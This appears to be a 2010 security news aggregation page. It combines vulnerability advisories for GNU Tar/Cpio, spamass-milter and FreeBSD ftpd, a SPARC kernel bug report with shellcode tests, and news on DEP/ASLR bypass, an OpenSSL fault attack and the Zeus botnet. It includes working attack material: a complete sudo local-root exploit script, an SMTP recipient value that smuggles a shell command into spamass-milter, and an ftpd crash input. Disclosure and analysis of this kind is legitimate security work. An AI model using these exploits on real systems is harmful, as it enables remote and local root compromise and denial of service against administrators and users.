uncompiled.com

I. BACKGROUND

GNU Tar and GNU Cpio are popular programs for managing archive
files. Both programs are included in many linux distributions. GNU Tar
is commonly used for exchanging source code archives.

Both programs include a client implementation for the remote mag tape
protocol (rmt). This protocol allows accessing a tape device attached
to a remote system via a rsh/ssh. It can also be used to
extract/create archive files on another system directly using Tar/Cpio
(although using rmt for accessing remote files is deprecated).

II. DESCRIPTION

The rmt client implementation of GNU Tar/Cpio contains a heap-based
buffer overflow which possibly allows arbitrary code execution.

The vulnerability is in the function rmt_read__ in lib/rtapelib.c:

/* Read up to LENGTH bytes into BUFFER from remote tape connection HANDLE.
Return the number of bytes read on success, SAFE_READ_ERROR on error. */
size_t
rmt_read__ (int handle, char *buffer, size_t length)
{
char command_buffer[COMMAND_BUFFER_SIZE];
size_t status;
size_t rlen;
size_t counter;

sprintf (command_buffer, “R%lu\n”, (unsigned long) length);
if (do_command (handle, command_buffer) == -1
|| (status = get_status (handle)) == SAFE_READ_ERROR)
return SAFE_READ_ERROR;

for (counter = 0; counter < status; counter += rlen, buffer += rlen)
{
rlen = safe_read (READ_SIDE (handle), buffer, status - counter);
if (rlen == SAFE_READ_ERROR || rlen == 0)
{
_rmt_shutdown (handle, EIO);
return SAFE_READ_ERROR;
}
}

return status;
}

The function first writes to the server how many bytes it wants to
read using sprintf() and do_command(). Then it reads the number of
bytes available into the variable status using get_status(). In the
for loop, the function reads status bytes from the server into the
buffer. However, it doesn't check whether status is actually less than
or equal the length of the buffer given by the parameter length. So a
malicious rmt server can overwrite data on the heap following the
buffer. Successful exploitation of this bug could possibly lead to
arbitrary code execution.

III. EXPLOIT VECTORS

The problem can be exploited when using an untrusted/compromised rmt
server. The impact is fairly low since rmt is rarely used today and
the rmt server is in most cases considered trustworthy.

However, this vulnerability can also be triggered when trying to
extract a tar file with a colon in the filename. In this case, tar
interprets the part before the colon as a hostname (or user () hostname)
and opens a rsh connection to this host. This may also be exploited if
the user uses the aunpack script from atool [1] to extract a tar
file. Many users of GNU Tar or atool don't know that rmt exists and
that tar treats filenames containing a colon differently. So a user
might run tar or aunpack on a file which he has received via email or
downloaded from a web page. Many users enter filenames using bash
auto-completion and thus might not even notice that there is anything
wrong with the filename.

For Cpio, this attack vector does not work since Cpio requires the
option --rsh-command to use rmt. Tar has compiled in the default value
"/usr/bin/rsh".

It is also possible that there are scripts out there which
automatically call Tar to extract a file with a name provided by an
untrusted source. If the script passes the filename with an (absolute
or relative) path or uses the --force-local option, this problem can
be avoided

Notes on rsh/ssh:

GNU Tar uses /usr/bin/rsh to execute the rmt server implementation
(/usr/bin/rmt) on the server. On most modern linux systems
/usr/bin/rsh is just a symlink to ssh. So an attempt to exploit this
vulnerability might make ssh ask the user whether to add a new key to
the known_hosts file. This gives users the possibility to cancel the
program and thus prevent successful exploitation. However, the problem
can still be exploited if the attacker has compromised a machine which
is already in the users known_hosts file or if the user has set
StrictHostKeyChecking to "no" in his ssh configuration.

IV. WORKAROUND

Do not use the integrated rmt client of GNU Tar/Cpio if the rmt server
is untrusted or potentially compromised. Always check that the
filename doesn't contain a colon when extracting tar files or use the
--force-local option.

V. SOLUTION:

Upgrade GNU Tar to version 1.23 and GNU Cpio to version 2.11.

Some Linux Distributions are going to release upgrades packages
today or in the next few days.

VI. DISCLOSURE TIMELINE

2010/02/12: Vendor and major Linux Distributions notified
2010/03/10: Public disclosure

VI. Credit

This vulnerability has been discovered by Jakob Lell from the
TU Berlin computer security working group (AGRS).

http://www.agrs.tu-berlin.de/parameter/en/

A copy of this advisory is also available on the following page:

http://www.agrs.tu-berlin.de/index.php?id=78327

[1] http://www.nongnu.org/atool/

Source

Spamassassin Milter Plugin Remote Root Zeroday (BTW zerodays lurk in the shadows not HERE) aka the postfix_joker advisory

Logic fuckup?

March 07 2010 // if you read this 10 years later you are definetly
seeking the nice 0days!

Greetz fly out to alex,andi,adize :D
+++ KEEP IT ULTRA PRIV8 +++

Software
+-+-+-+-+
Apache Spamassassin
SpamAssassin is a mail filter which attempts to identify spam using
a variety of mechanisms including text analysis, Bayesian filtering,
DNS blocklists, and collaborative filtering databases.

SpamAssassin is a project of the Apache Software Foundation (ASF).

Postfix
What is Postfix? It is Wietse Venema’s mailer that started life at IBM
research as an alternative to the widely-used Sendmail program.
Postfix attempts to be fast, easy to administer, and secure.
The outside has a definite Sendmail-ish flavor, but the inside is
completely different.

Spamassassin Milter
A little plugin for the Sendmail Milter (Mail Filter) library
that pipes all incoming mail (including things received by rmail/UUCP)
through the SpamAssassin, a highly customizable SpamFilter.

Remote Code Execution Vulnerability
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

The Spamassassin Milter Plugin can be tricked into executing any command
as the root user remotely.
If spamass-milter is run with the expand flag (-x option) it runs a
popen() including the attacker supplied
recipient (RCPT TO).

From spamass-milter-0.3.1 (-latest) Line 820:

//
// Gets called once for each recipient
//
// stores the first recipient in the spamassassin object and
// stores all addresses and the number thereof (some redundancy)
//

sfsistat
mlfi_envrcpt(SMFICTX* ctx, char** envrcpt)
{
struct context *sctx = (struct context*)smfi_getpriv(ctx);
SpamAssassin* assassin = sctx->assassin;
FILE *p;
#if defined(__FreeBSD__)
int rv;
#endif

debug(D_FUNC, “mlfi_envrcpt: enter”);

if (flag_expand)
{
/* open a pipe to sendmail so we can do address
expansion */

char buf[1024];
char *fmt=”%s -bv \”%s\” 2>&1″;

#if defined(HAVE_SNPRINTF)
snprintf(buf, sizeof(buf)-1, fmt, SENDMAIL, envrcpt[0]);
#else
/* XXX possible buffer overflow here // is this a
joke ?! */
sprintf(buf, fmt, SENDMAIL, envrcpt[0]);
#endif

debug(D_RCPT, “calling %s”, buf);

#if defined(__FreeBSD__) /* popen bug – see PR bin/50770 */
rv = pthread_mutex_lock(&popen_mutex);
if (rv)
{
debug(D_ALWAYS, “Could not lock popen mutex: %
s”, strerror(rv));
abort();
}
#endif

p = popen(buf, “r”); [1]
if (!p)
{
debug(D_RCPT, “popen failed(%s). Will not
expand aliases”, strerror(errno));
assassin->expandedrcpt.push_back(envrcpt[0]);

[1] the vulnerable popen() call.

Remote Root Exploit PoC through postfix
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

$ nc localhost 25
220 ownthabox ESMTP Postfix (Ubuntu)
mail from: me () me com
250 2.1.0 Ok
rcpt to: root+:”|touch /tmp/foo”
250 2.1.5 Ok

$ ls -la /tmp/foo
-rw-r–r– 1 root root 0 2010-03-07 19:46 /tmp/foo

Signed,

Kingcope

Source

Despite years of efforts by software security teams at major vendors to harden the operating systems and browsers that are the most common targets of attackers, exploitation of new as well as older vulnerabilities is still simpler than many people might think.

Microsoft, Mozilla, Adobe and even Apple, to some degree, have put in place technologies in their newer products that are designed to make it more difficult for attackers to exploit vulnerabilities, including unknown flaws. However, these technologies, which include DEP, ASLR and SafeSEH, are mitigations, not absolute defenses against exploitation, said Dino Dai Zovi, a researcher and chief scientist at Endgame Systems, in a talk at the RSA Conference here. As effective as some of these technologies can be, they’re not meant to eliminate the possibility of a system being compromised.

“Attack mitigation takes the universe of exploit techniques and narrows it down,” he said.”But preventing the introduction of malicious code isn’t enough to prevent malicious computations.”

Microsoft has been steadily adding memory-protection technologies such as ASLR and DEP to its products over the last few years, and they are now enabled by default in the latest versions of Windows and Internet Explorer. Address Space Layout Randomization (ASLR) is designed to make it more difficult for attackers to overwrite a specific portion of memory by randomizing the location of key areas in a process’s memory. With things in unpredictable locations, it’s much more dfficult for attackers to get their data into the right place for an attack.

However, even with ASLR and Data Execution Prevention (DEP) enabled, it’s still possible to exploit vulnerabilities in the most recent versions of IE and Windows. In his talk, Dai Zovi showed a live demonstration in which he exploited the so-called Aurora IE vulnerability on Windows 7 running IE8. This configuration was thought to be immune to such attacks, but Dai Zovi was able to bypass the memory protections by using a combination of several attack techniques chained together.The presence of DEP and ASLR made the attack more difficult, but not impossible.

Dai Zovi said that while his attack worked in this instance, that’s no guarantee that a similar technique would work in another situation.

“Exploitation in the wild that bypasses DEP is pretty rare,” he said. DEP is specifically designed to prevent attackers from forcing application to execute data from portions of the memory that are designated as non-executable.

In fact, Microsoft has acknowledged the limitations of DEP from the beginning, and says that it is simply one of several tools that can help prevent memory corruption attacks.

“DEP presents a hurdle to attackers as they attempt to successfully exploit security vulnerabilities. In some cases, it is possible for an attacker to evade DEP by using an exploitation technique such as return-to-libc. DEP by itself is generally not a robust mitigation. DEP is a critical part of the broader set of exploit mitigation technologies that have been developed by Microsoft such as ASLR, SeHOP, SafeSEH, and /GS. These mitigation technologies complement one another; for example DEP’s weaknesses tend to be offset by ASLR and vice versa. DEP and ASLR used together are very difficult to bypass. The known bypasses that exist have been tied to specific application contexts (such as the IE7 and earlier bypass from Mark Dowd and Alex Sotirov),” Microsoft’s Robert Hensing wrote last year.

But, as Dai Zovi and others have shown, even with these technologies enabled, exploitation is still possible. Attackers have begun using third-party applications to bypass ASLR and DEP on Windows recently. A researcher named Dionysus Blazakis showed in February how he could use a technique called JIT-spraying to exploit a vulnerability in Adobe Flash and bypass both ASLR and DEP. This scenario is not something that Microsoft security engineers would have contemplated or been able to prevent on their end; it’s a result of the complex interactions among applications in production environments, not test labs.

“Systems fail more because of implementation than theory. The real world is complicated,” Dai Zovi said.

Source

FreeBSD ftpd globbing bug – null pointer dereference ?

Affected FreeBSD Releases
+-+-+-+-+-+-+-+-+-+
FreeBSD 8.0, 6.3 and 4.9

Affected OpenBSD Releases
+-+-+-+-+-+-+-+-+-+
OpenBSD 4.6

Testing Environment
+-+-+-+-+-+-+-+-+-+
FreeBSD localhost.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21
15:48:17 UTC 2009
root () almeida cse buffalo edu:/usr/obj/usr/src/sys/GENERIC i386

Full Description
+-+-+-+-+-+-+-+-+-+
FreeBSD (tested back to 4.9-Release) (and OpenBSD 4.6) has a bug in its
ftpd when handling globbing requests.

My investigation results in this being a null pointer dereference in
popen.c.
I am not sure if this could be a heap overrun, but I don’t think so.

from popen.c:

/* glob each piece */
gargv[0] = argv[0];
for (gargc = argc = 1; argv[argc] && gargc < (MAXGLOBARGS-1); argc++) {
glob_t gl;
int flags = GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE;

memset(&gl, 0, sizeof(gl));
gl.gl_matchc = MAXGLOBARGS;
flags |= GLOB_LIMIT;
[1] if (glob(argv[argc], flags, NULL, &gl))
gargv[gargc++] = strdup(argv[argc]);
[2] else
[3] for (pop = gl.gl_pathv; *pop && gargc < (MAXGLOBARGS-1);
pop++)
gargv[gargc++] = strdup(*pop);
globfree(&gl);
}

At [1] glob() is called. if theres a long directory (for example "A" x
200) and a request like described
in "how to repeat this problem" is sent to the ftpd it crashes. My
assumption is because it lands in the
else clause [2], glob doesn't fail but gives back a zeroed out gl
structure. In [3] then there's no check
if pop is null and therefore *pop gets dereferenced which is a null
pointer and the ftpd instance crashes.

Could someone please shed some light into why glob doesn't fail but
gives a zeroed out structure back?

How to repeat the problem
+-+-+-+-+-+-+-+-+-+-+-+-+-+

$ ftp 192.168.2.11
Connected to 192.168.2.11.
220 localhost.Belkin FTP server (Version 6.00LS) ready.
Name (192.168.2.11:nr): kcope
331 Password required for kcope.
Password:
230 User kcope logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> mkdir
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
257
“WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW”
directory created.
ftp> ls {W*/../W*/../W*/../W*/../W*/../W*/../W*/}
200 PORT command successful.
—snip—

on the other side:

—snip—
0×282261e5 in read () at read.S:3
3 RSYSCALL(read)
Current language: auto; currently asm
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0×0805622c in getline ()
(gdb) i r
eax 0×0 0
ecx 0×0 0
edx 0×0 0
ebx 0xbfbfd911 -1077946095
esp 0xbfbfba70 0xbfbfba70
ebp 0xbfbfcc08 0xbfbfcc08
esi 0×1 1
edi 0xbfbfcbf4 -1077949452
eip 0×805622c 0×805622c
eflags 0×10293 66195
cs 0×33 51
ss 0×3b 59
ds 0×3b 59
es 0×3b 59
fs 0×3b 59
gs 0×1b 27
(gdb) x/10i $eip
0×805622c : mov (%edx),%eax
0×805622e : setle %cl
0×8056231 : mov %ecx,%esi
0×8056233 : test %eax,%eax
0×8056235 : je 0×8056281
0×8056237 : test %cl,%cl
0×8056239 : je 0×8056281
0×805623b : mov %edx,%ebx
0×805623d : mov 0xffffee7c(%ebp),%edx
0×8056243 : lea 0xffffee90(%ebp,%edx,4),%edi
(gdb) i f
Stack level 0, frame at 0xbfbfcc10:
eip = 0×805622c in getline; saved eip 0×805047b
called by frame at 0xbfbfcc14
Arglist at 0xbfbfcc08, args:
Locals at 0xbfbfcc08, Previous frame’s sp is 0xbfbfcc10
Saved registers:
ebx at 0xbfbfcbfc, ebp at 0xbfbfcc08, esi at 0xbfbfcc00, edi at
0xbfbfcc04,
eip at 0xbfbfcc0c
(gdb)

Testing program:

—snip—

#include
#include

#define MAXUSRARGS 100
#define MAXGLOBARGS 1000

void do_glob() {
glob_t gl;
char **pop;

char buffer[256];
strcpy(buffer, “{A*/../A*/../A*/../A*/../A*/../A*/../A*}”);

int flags = GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE;
memset(&gl, 0, sizeof(gl));
gl.gl_matchc = MAXGLOBARGS;
flags |= GLOB_LIMIT;
if (glob(buffer, flags, NULL, &gl)) {
printf(“GLOB FAILED!\n”);
return 0;
}
else
// for (pop = gl.gl_pathv; pop && *pop && 1 < (MAXGLOBARGS-1);
for (pop = gl.gl_pathv; *pop && 1 < (MAXGLOBARGS-1);
pop++) {
printf("glob success");
return 0;
}
globfree(&gl);
}

main(int argc, char **argv) {
do_glob();
do_glob();
}
---snip---

05 March 2010
/kingcope

Source

Computer scientists say they’ve discovered a “severe vulnerability” in the world’s most widely used software encryption package that allows them to retrieve a machine’s secret cryptographic key.

The bug in the OpenSSL cryptographic library is significant because the open-source package is used to protect sensitive data in countless applications and operating systems throughout the world. Although the attack technique is difficult to carry out, it could eventually be applied to a wide variety of devices, particularly media players and smartphones with anti-copying mechanisms.

“Wherever you need to verify the origin of a piece of software or a piece of information, those building blocks come in handy,” said Karsten Nohl, an independent security researcher who in unrelated attacks has broken encryption in widely used smartcards and cordless phones. “The OpenSSL library provides much more than just SSL.”

The scientists, from the University of Michigan’s electrical engineering and computer science departments, said the bug is easily fixed by applying cryptographic “salt” to an underlying error-checking algorithm. The additional randomization would make the attack unfeasible.

An OpenSSL official, who asked that his name not be published, said engineers are in the process of pushing out a patch and stressed the attack is difficult to carry out in real-world settings.

The university scientists found that they could deduce tiny pieces of a private key by injecting slight fluctuations in a device’s power supply as it was processing encrypted messages. In a little more than 100 hours, they were able to feed the device enough “transient faults” that they were able to assemble the entirety of its 1024-bit key.

“This is probably not as much of a threat to a server system as it is to a consumer device,” said Todd Austin, one of the scientists who devised the attack. “The place where this would be more applicable would be if you want to attack a Blu-ray player (where) you have an environment where someone is giving you a device that has a private key to protect intellectual property and you have physical access to the device.”

Servers, by contrast, would be much harder to attack because they are generally located in places that prevent people from manipulating their power supply. But that doesn’t mean they’re immune to such exploits. In events where a machine was overheating or otherwise experiencing power fluctuations, the vulnerability will cause servers to leak secret data that could be intercepted by attackers.

The scientists are also experimenting with the possibility of exploiting the bug using lasers or natural radiation sources, they said.

The attack is enabled by what the researchers described as a “severe vulnerability” in the OpenSSL innards that carry out authentication based on the RSA public key encryption algorithm. It resides in the so-called fixed window exponentiation algorithm of the open-source crypto library, which is used when errors arise. By triggering a single-bit error in a multiplication operation, the scientists were able to force OpenSSL to divulge 4 bits of the secret key.

Once they gathered about 8,800 malformed messages from the targeted device, they fed the data into an 81-machine cluster of 2.4 GHz Pentium-4 systems running a custom-designed algorithm. They applied the technique to an embedded hardware device consisting of a Sparc processor running a Linux operating system and were able to extract its 1024-bit private key in 104 hours.

The researchers said it may be possible to apply the method to other crypto libraries, such as one offered by the Mozilla Foundation.

Source

From: Kingcope
Date: Tue, 02 Mar 2010 00:08:44 +0100

Just for the record.

#!/bin/sh
# Tod Miller Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4
# local root exploit
# March 2010
# automated by kingcope
# Full Credits to Slouching
echo Tod Miller Sudo local root exploit
echo by Slouching
echo automated by kingcope
if [ $# != 1 ]
then
echo "usage: ./sudoxpl.sh "
exit
fi
cd /tmp
cat > sudoedit < < _EOF
#!/bin/sh
echo ALEX-ALEX
su
/bin/su
/usr/bin/su
_EOF
chmod a+x ./sudoedit
sudo ./sudoedit $1

cheers,
kingcope

Source

An update which fixes around 40 bugs is available for the PHP 5.2 development branch. Version 5.2.13 comes highly recommended for all PHP 5.2.x users, as it includes a number of security-related fixes. These include a bug when validating the safe_mode configuration variable in the tempnam() function which arises when the path does not end in /). An open_basedir/safe_mode bypass vulnerability in the session extension has also been fixed.

More details about the release, including other significant changes, can be found in the release announcement and change log. PHP 5.2.13 is available to download from the project’s site.

The current PHP development branch is PHP 5.3, for which version 5.3.1 has been available since November 2009. A third release candidate for PHP 5.3.2 was released on the 23rd of February.

Source

To make better cybersecurity-related decisions a senior FBI official recommends considering a simple algebraic equation—risk = threat x vulnerability x consequence—rather than solely focusing on threat vectors and actors.

Each factor is important, Steven Chabinsky, deputy assistant director at the FBI’s Cyber Division, said today. Chabinsky spoke on a panel at the Armed Forces Communications and Electronics Association Homeland Security Conference in Washington.

Nation-states that commit espionage, terrorist organizations, individuals interested in using the Internet as an attack tool and criminal syndicates are the types of attackers mostly likely to target computer systems in both the public and private sectors, he said. Threat vectors on which the FBI is focused include remote access and intrusion, supply chain vulnerabilities, proximate or close access threats, and insider access threats, he said.

Chabinsky said the risk model is compelling is because risk drops down to zero if any of those three elements or variables is zero. He said the risk model is the first place he goes when he needs to step back strategically.

“Unfortunately, we haven’t gotten to the point where I feel we can maintain at zero any one of those element so we have to constantly figure out as an organization how we are we driving down each of those,” he said.

He added, “If you look through the risk model you’ll find that you have opportunities on the threat vulnerability and consequence management side, and you have to find your partners so that you could work together.”

Source

Hi Dave & list:

I’m writing to report a bug in recent vanilla kernels regarding the
ability to execute in non-executable pages on SPARC. I’m no SPARC
expert, but I’ll try to explain as best I can the problem and make
myself available for debugging/testing any fixes.

I have 4 sparc systems currently, a Netra T1, an Ultra 10, a Sunfire
V210, and a Blade 2500. The first two systems run the latest 2.4
kernels and experience no problems. The second two systems run recent
2.6 kernels (2.6.31 and 2.6.32) and both utilize the Cheetah+ MMU. Both
of these systems running the recent 2.6 kernels exhibit the problem.

I’ve provided two simple testcases that illustrate the problem. Either
run them in a loop or just multiple times — eventually instead of
receiving a segfault (as it should every time for attempting to execute
on the stack, which is non-executable by default per ABI) the shellcode
I’ve set up on the stack will execute without problems. In the first
testcase I haven’t set up enough code to perform a return from the
function pointer, so you see the varied signals when an instruction
fetch is attempted on the 2nd instruction (made up of whatever
happened to be located on the stack). In the second case I set up the
proper ret/restore and the program is able to exit cleanly.

I’m willing to do anything to help debug the problem, but I thought it
would
be wiser to report it first in case anyone had any immediate ideas on
what the problem could be. I figured it would also help in being able
to debug the issue more effectively, given its seemingly somewhat-random
nature.

Please keep the PaX team and myself CC’d as we’re not subscribed to the
list.

Thanks for your help,
-Brad

cat /proc/self/maps output (showing the stack non-executable):
00010000-00014000 r-xp 00000000 08:02 1769474 /bin/cat
00024000-00026000 rwxp 00004000 08:02 1769474 /bin/cat
00026000-00048000 rwxp 00000000 00:00 0 [heap]
f7cf0000-f7e2a000 r–p 00000000 08:02 295830 /usr/lib/locale/locale-archive
f7e2c000-f7fa4000 r-xp 00000000 08:02 1277958 /lib/ultra3/libc-2.7.so
f7fa4000-f7fb4000 —p 00178000 08:02 1277958 /lib/ultra3/libc-2.7.so
f7fb4000-f7fba000 rwxp 00178000 08:02 1277958 /lib/ultra3/libc-2.7.so
f7fba000-f7fbc000 rwxp 00000000 00:00 0
f7fbc000-f7fde000 r-xp 00000000 08:02 1270085 /lib/ld-2.7.so
f7fec000-f7ff0000 rwxp 00020000 08:02 1270085 /lib/ld-2.7.so
f7ff0000-f7ff2000 rw-p 00000000 00:00 0
ffdb6000-ffde0000 rw-p 00000000 00:00 0 [stack]

First test case:
#include

typedef int (* _wee)(void);

int main(void)
{
char buf[4] = { ‘\x81′, ‘\xc7′, ‘\xe0′, ‘\x08′};
_wee wee;
printf(“%p\n”, &buf);
wee = (_wee)&buf;
wee();

return 0;
}

gdb output in 90-95% of the cases:
Program received signal SIGSEGV, Segmentation fault.
0xff9d9cb0 in ?? ()

gdb output in the other 5-10% of cases:
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/test
0xff811cb0

Program received signal SIGBUS, Bus error.
0xff811cb4 in ?? ()
(gdb) x/x 0xff811cb0
0xff811cb0: 0×81c7e008
(gdb) x/i 0xff811cb0
0xff811cb0: ret
0xff811cb4: lda [ %g4 + %l0 ] (229), %f31

(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/test
0xff97dcb0

Program received signal SIGILL, Illegal instruction.
0xff97dcb4 in ?? ()
(gdb) x/8x $pc-4
0xff97dcb0: 0×81c7e008 0xff97dcb0 0xf7f3af00
0×00000000
0xff97dcc0: 0×00000000 0×00000000 0xfffffffc
0×00000000
(gdb) x/i $pc-4
0xff97dcb0: ret
0xff97dcb4: ldqa [ %i7 + %l0 ] (229), %f62

modified code so it executed a ret / restore:
#include

typedef int (* _wee)(void);

int main(void)
{
char buf[8] = { ‘\x81′, ‘\xc7′, ‘\xe0′, ‘\x08′, ‘\x81′, ‘\xe8′,
‘\x00′, ‘\x00′ };
_wee wee;
printf(“%p\n”, &buf);
wee = (_wee)&buf;
wee();

return 0;
}

gdb output in the 5-10% case:
Starting program: /root/test
0xffb4fca8

Program exited with code 01.

Source

More than 74,000 PCs at nearly 2,500 organizations around the globe were compromised over the past year and a half in a botnet infestation designed to steal login credentials to bank sites, social networks, and e-mail systems, a security firm said Wednesday.

The systems were infected with the Zeus Trojan and the botnet was dubbed “Kneber” after a username that linked the infected PCs on corporate and government systems, according to NetWitness.

The Wall Street Journal reported that Merck, Cardinal Health, Paramount Pictures, and Juniper Networks were among the targets in the attack. NetWitness speculated that criminals in Eastern Europe using a command-and-control server in Germany sent attachments containing the malware in e-mails or links to the malware on Web sites that employees within the companies clicked on.

NetWitness said it discovered more than 75 gigabytes worth of stolen data during routine analytic tasks as part of an evaluation of a client network on January 26. The cache of stolen data included 68,000 corporate login credentials, access to e-mail systems, online banking sites, Facebook, Yahoo, Hotmail, 2,000 SSL (Secure Sockets Layer) certificate files and data on individuals, NetWitness said in a statement and in a whitepaper available for download from its Web site.

In addition to stealing specific data, Zeus can be used to search for and steal any file on the computer, download and execute programs and allow someone to remotely control the computer.

More than half of the compromised machines were also infected with peer-to-peer bot malware called Waledac, the company said. Nearly 200 countries were affected, with most of the infections found in Egypt, Mexico, Saudi Arabia, Turkey and the United States.

The news comes after Google announced an attack targeting it and what is believed to be more than 30 other companies and which was linked back to China. McAfee dubbed that attack “Operation Aurora.”

“While Operation Aurora shed light on advanced threats from sponsored adversaries, the number of compromised companies and organizations pales in comparison to this single botnet,” said Amit Yoran, chief executive of NetWitness and former Director of the National Cyber Security Division. “These large-scale compromises of enterprise networks have reached epidemic levels.”

Source